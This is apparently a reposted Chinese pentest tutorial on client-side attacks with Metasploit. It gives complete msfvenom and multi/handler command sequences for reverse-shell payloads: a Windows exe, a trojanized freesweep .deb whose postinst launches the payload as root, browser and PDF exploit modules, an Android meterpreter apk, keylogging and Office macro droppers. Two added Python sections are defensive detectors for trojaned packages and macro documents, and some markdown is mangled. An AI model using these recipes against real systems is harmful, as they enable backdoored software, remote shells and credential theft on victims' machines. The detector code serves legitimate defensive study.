• When the network perimeter cannot be breached, switch to attacking the client side: use social engineering to get a foothold on a user's machine, then pivot from there into the production business network
  • A web site carrying exploit code
  • doc, pdf and similar documents carrying exploit code
  • Trick the victim into running the payload directly

    Windows client

    # generate the payload (9 passes of shikata_ga_nai, null byte excluded)
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f exe -o 1.exe
    # start apache and serve the file
    service apache2 start
    cp 1.exe /var/www/html/
    # listen with msf; the handler payload must match what msfvenom built
    msfconsole
    use exploit/multi/handler
    set payload windows/shell/reverse_tcp
    set LHOST 192.168.1.121
    set LPORT 4444
    exploit

    Linux client

    # grab a legitimate deb to trojanize
    apt --download-only install freesweep
    cd /var/cache/apt/archives   # the deb lands in this directory
    dpkg -x freesweep_0.90-3+b1_amd64.deb free   # unpack the package's files into free/
    cd free/
    mkdir DEBIAN
    cd DEBIAN/
    # create the control file
    vi control
    Package: freesweep
    Version: 0.90-3
    Section: Games and Amusement
    Priority: optional
    Architecture: amd64
    Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
    Description: a text-based minesweeper
     Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display in Linux console, in an xterm, and in most text-based terminals currently in use.
    # create the post-install script. dpkg runs it as root right after unpacking, so no sudo
    # is needed and the reverse shell comes back as root; the trailing & keeps dpkg from
    # blocking on the payload
    vi postinst
    #!/bin/sh
    chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
    chmod 755 postinst
    # generate the payload straight into the package's file tree. A static linux/x86 ELF only
    # runs on an amd64 host if the kernel has 32-bit compat enabled; linux/x64/shell/reverse_tcp
    # matches the package's Architecture
    msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores
    # build the deb (written to /root/free.deb)
    dpkg-deb --build /root/free
    service apache2 start
    cp /root/free.deb /var/www/html/
    # listen with msf; the handler payload must match what msfvenom built
    msfconsole
    msf > use exploit/multi/handler
    set payload linux/x86/shell/reverse_tcp
    set LHOST 192.168.1.121
    set LPORT 4444
    exploit
    Source: https://fishpond.blog.csdn.net/article/details/105805423
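
Added example, not code from the original post: a stdlib-only Python inspector for the defensive side of the deb trick above. It parses the ar container and both tarballs, pulls out the maintainer scripts, flags backgrounded commands and setuid/setgid chmods in them, and reports ELF files whose class disagrees with the declared Architecture, which is exactly what the recipe above produces (a 32-bit linux/x86 payload inside an amd64 package). The sample package is constructed in memory with fake ELF headers standing in for the real binaries; function names, the suspicious-line patterns and the sample contents are mine.

```python
"""Static inspection of a .deb for the trojan indicators used above (stdlib only).

A .deb is an ar archive holding debian-binary, control.tar.* and data.tar.*.
The recipe above hides its payload behind a maintainer script (postinst runs
as root at install time), so this pulls those scripts out, flags backgrounded
commands and setuid/setgid chmods, and reports ELF files whose class disagrees
with the declared Architecture.  build_sample_deb() is a constructed package;
its "ELF" files are fake headers, not real payloads.
"""
import io
import json
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
BACKGROUND_RE = re.compile(r"(?<![&|>])&(?!&)")  # a lone '&' backgrounds a command
SETID_RE = re.compile(r"chmod\s+(?:[2467][0-7]{3}|[ugoa]*\+[rwx]*s)")  # setuid/setgid bits
EXPECTED_CLASS = {"amd64": "64-bit", "arm64": "64-bit", "i386": "32-bit", "armhf": "32-bit"}


def ar_members(blob: bytes) -> dict:
    """Parse a classic ar archive into {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, off = {}, len(AR_MAGIC)
    while off + 60 <= len(blob):
        hdr = blob[off:off + 60]  # 60-byte fixed header, terminated by "`\n"
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header at offset %d" % off)
        name = hdr[:16].decode("ascii").rstrip().rstrip("/")
        size = int(hdr[48:58])
        members[name] = blob[off + 60:off + 60 + size]
        off += 60 + size + (size % 2)  # member data is padded to an even length
    return members


def tar_files(blob: bytes) -> dict:
    """Regular files in a (possibly compressed) tar, keyed by path without './'."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        for m in tf.getmembers():
            if m.isfile():
                out[m.name.lstrip("./")] = tf.extractfile(m).read()
    return out


def inspect_deb(blob: bytes) -> dict:
    members = ar_members(blob)
    ctrl = next((v for k, v in members.items() if k.startswith("control.tar")), None)
    data = next((v for k, v in members.items() if k.startswith("data.tar")), None)
    if ctrl is None or data is None:
        raise ValueError("missing control.tar or data.tar member")
    control_files = tar_files(ctrl)
    fields = {}
    for line in control_files.get("control", b"").decode(errors="replace").splitlines():
        if ":" in line and not line.startswith(" "):  # continuation lines start with a space
            k, v = line.split(":", 1)
            fields[k.strip()] = v.strip()
    arch = fields.get("Architecture", "?")
    report = {"package": fields.get("Package", "?"), "arch": arch, "maintainer_scripts": [],
              "suspicious_lines": [], "elf_files": [], "warnings": []}
    for name, body in control_files.items():
        if name not in MAINTAINER_SCRIPTS:
            continue
        report["maintainer_scripts"].append(name)
        for lineno, line in enumerate(body.decode(errors="replace").splitlines(), 1):
            if BACKGROUND_RE.search(line) or SETID_RE.search(line):
                report["suspicious_lines"].append(f"{name}:{lineno}: {line.strip()}")
    for path, body in tar_files(data).items():
        if body[:4] != b"\x7fELF":
            continue
        elf_class = {1: "32-bit", 2: "64-bit"}.get(body[4], "unknown")  # EI_CLASS byte
        report["elf_files"].append({"path": path, "class": elf_class, "size": len(body)})
        if EXPECTED_CLASS.get(arch) not in (None, elf_class):
            report["warnings"].append(f"{path}: {elf_class} ELF in an {arch} package")
    return report


# ---- constructed sample mirroring the recipe above (fake ELF headers, no real payload) ----
FAKE_ELF32 = b"\x7fELF\x01\x01\x01" + b"\x00" * 57 + b"constructed 32-bit stub"
FAKE_ELF64 = b"\x7fELF\x02\x01\x01" + b"\x00" * 57 + b"constructed 64-bit stub"


def _tar_gz(files: dict) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (content, mode) in files.items():
            ti = tarfile.TarInfo(path)
            ti.size, ti.mode = len(content), mode
            tf.addfile(ti, io.BytesIO(content))
    return buf.getvalue()


def _ar(members: list) -> bytes:
    out = bytearray(AR_MAGIC)
    for name, content in members:
        out += (name.encode().ljust(16) + b"0".ljust(12) + b"0".ljust(6) + b"0".ljust(6)
                + b"100644".ljust(8) + str(len(content)).encode().ljust(10) + b"`\n")
        out += content + (b"\n" if len(content) % 2 else b"")
    return bytes(out)


def build_sample_deb() -> bytes:
    control = (b"Package: freesweep\nVersion: 0.90-3\nArchitecture: amd64\n"
               b"Description: a text-based minesweeper\n Constructed sample package.\n")
    postinst = (b"#!/bin/sh\nchmod 2755 /usr/games/freesweep_scores && "
                b"/usr/games/freesweep_scores & /usr/games/freesweep &\n")
    ctrl = _tar_gz({"./control": (control, 0o644), "./postinst": (postinst, 0o755)})
    data = _tar_gz({"./usr/games/freesweep": (FAKE_ELF64, 0o755),
                    "./usr/games/freesweep_scores": (FAKE_ELF32, 0o755)})
    return _ar([("debian-binary", b"2.0\n"), ("control.tar.gz", ctrl), ("data.tar.gz", data)])


if __name__ == "__main__":
    print(json.dumps(inspect_deb(build_sample_deb()), indent=2))
```

Run it against a real package with `inspect_deb(open("free.deb", "rb").read())`; zstd-compressed data.tar members from newer dpkg are not handled by tarfile and would need decompressing first.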

    Using an Acrobat Reader vulnerability to run the payload

    # build the malicious pdf
    exploit/windows/fileformat/adobe_utilprintf
    # or serve the same bug from a malicious web site
    exploit/windows/browser/adobe_utilprintf
    # once the Meterpreter session is up
    use priv
    run post/windows/capture/keylog_recorder

    利用 flash 插件和IE浏览器漏洞执行 paylaod

    ```powershell use exploit/multi/browser/adobe_flash_hacking_team_uaf use exploit/multi/browser/adobe_flash_opaque_background_uaf use auxiliary/server/browser_autopwn2(打包了msf payload)

    IE浏览器漏洞

    use exploit/windows/browser/ms14_064_ole_code_execution
  1. <a name="MoEtt"></a>
  2. ### 利用 JRE 漏洞执行 payload
  3. ```powershell
  4. use exploit/multi/browser/java_jre17_driver_manager
  5. use exploit/multi/browser/java_jre17_jmxbean
  6. use exploit/multi/browser/java_jre17_reflection_type

Generating an Android backdoor

msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.121
msf payload(reverse_tcp) > generate -f a.apk -p android -t raw   # writes the apk (older generate syntax; msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -o a.apk does the same)
# start the listener
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit

Macro infection

Infect Word/Excel documents with a macro
This gets past security controls that only check the file type (extension), since the carrier is an ordinary-looking Office document
The reverse_tcp connection is outbound from the victim, which the default Windows 10 firewall allows
Generate the VBA script

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
# output has two parts: the VBA macro code (pasted into the document's macro editor) and the hex-encoded payload (appended to the document body, where the macro reads it back)
# listen with msf; the handler payload must match the one built above
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit
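
Added example, not code from the original post: a Python check that decides whether an Office document can carry a macro by looking at its content rather than its extension, which is the file-type check the macro trick above slips past. OOXML files are zip containers, so the presence of word/vbaProject.bin (or the xl/ and ppt/ equivalents) is checked directly; legacy .doc/.xls files are OLE2 compound files and are sent for review, since confirming VBA there needs an OLE parser; and the document body is scanned for the hex blob that the vba-exe dropper reads back and executes. The blob pattern assumes the `&H4D&H5A…` VBA hex-literal form (escaped as `&amp;H` inside document.xml); adjust it if your msfvenom version emits the data differently. The sample files, the fake PE header and the function names are constructed here.

```python
"""Content-based classification of Office documents (stdlib only).

Extension checks are what the macro trick above slips past, so decide from the
bytes: OOXML files are zip containers whose VBA project lives in
word/vbaProject.bin (or xl/, ppt/); legacy .doc/.xls are OLE2 compound files
that can always carry VBA; and the vba-exe dropper keeps its executable in the
document body as VBA hex literals (&H4D&H5A...), which XML escapes as &amp;H
inside document.xml.  All samples are constructed here; the "PE" is a fake header.
"""
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"
VBA_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
TEXT_PARTS = ("word/document.xml", "xl/sharedStrings.xml", "ppt/slides/slide1.xml")
MACRO_FREE_EXT = (".docx", ".xlsx", ".pptx")
HEXBLOB_RE = re.compile(r"(?:&(?:amp;)?H[0-9A-Fa-f]{2}){64,}")  # 64+ consecutive byte literals (assumed form)
HEXBYTE_RE = re.compile(r"&(?:amp;)?H([0-9A-Fa-f]{2})")


def decode_vba_hex(text: str) -> bytes:
    """Undo what the generated macro does at run time: &H.. literals back to bytes."""
    return bytes(int(h, 16) for h in HEXBYTE_RE.findall(text))


def classify(filename: str, blob: bytes) -> dict:
    name = filename.lower()
    res = {"container": "unknown", "vba": "unknown", "embedded_pe": False, "ext_mismatch": False}
    if blob.startswith(OLE_MAGIC):
        res["container"] = "ole2"
        res["vba"] = "possible"                              # needs an OLE parser to confirm
        res["ext_mismatch"] = name.endswith(MACRO_FREE_EXT)  # binary doc behind an OOXML name
    elif blob.startswith(ZIP_MAGIC):
        res["container"] = "ooxml"
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            names = set(zf.namelist())
            res["vba"] = "yes" if any(p in names for p in VBA_PARTS) else "no"
            res["ext_mismatch"] = res["vba"] == "yes" and name.endswith(MACRO_FREE_EXT)
            for part in TEXT_PARTS:  # the dropper's payload sits in the visible text
                if part in names:
                    m = HEXBLOB_RE.search(zf.read(part).decode("utf-8", "replace"))
                    if m and decode_vba_hex(m.group(0))[:2] == b"MZ":
                        res["embedded_pe"] = True
    if res["vba"] == "yes" or res["embedded_pe"] or res["ext_mismatch"]:
        res["verdict"] = "suspicious"
    elif res["container"] == "ooxml":
        res["verdict"] = "clean"
    else:
        res["verdict"] = "review"
    return res


# ---- constructed samples ----
def _ooxml(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for part, content in parts.items():
            zf.writestr(part, content)
    return buf.getvalue()


FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"          # fake header, not an executable
FAKE_HEX = "".join("&amp;H%02X" % b for b in FAKE_PE)    # as it appears inside document.xml
FAKE_VBA = OLE_MAGIC + b"\x00" * 24                      # vbaProject.bin is itself an OLE2 file

SAMPLES = {
    "notes.docx": _ooxml({"[Content_Types].xml": b"<Types/>",
                          "word/document.xml": b"<w:document>quarterly notes</w:document>"}),
    "invoice.docx": _ooxml({"[Content_Types].xml": b"<Types/>",
                            "word/document.xml": b"<w:document>see attached</w:document>",
                            "word/vbaProject.bin": FAKE_VBA}),
    "report.docm": _ooxml({"[Content_Types].xml": b"<Types/>",
                           "word/document.xml": ("<w:document>%s</w:document>" % FAKE_HEX).encode(),
                           "word/vbaProject.bin": FAKE_VBA}),
    "resume.doc": OLE_MAGIC + b"\x00" * 504,
    "resume.docx": OLE_MAGIC + b"\x00" * 504,
}


def scan_all(samples: dict = SAMPLES) -> dict:
    return {name: classify(name, blob)["verdict"] for name, blob in samples.items()}


if __name__ == "__main__":
    for sample_name, sample_blob in SAMPLES.items():
        print(sample_name, classify(sample_name, sample_blob))
```

The verdict deliberately never trusts the name: `invoice.docx` is flagged because it contains a VBA project, `resume.docx` because it is not a zip at all, and `report.docm` both for its macro and for the MZ-headed blob in its body.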
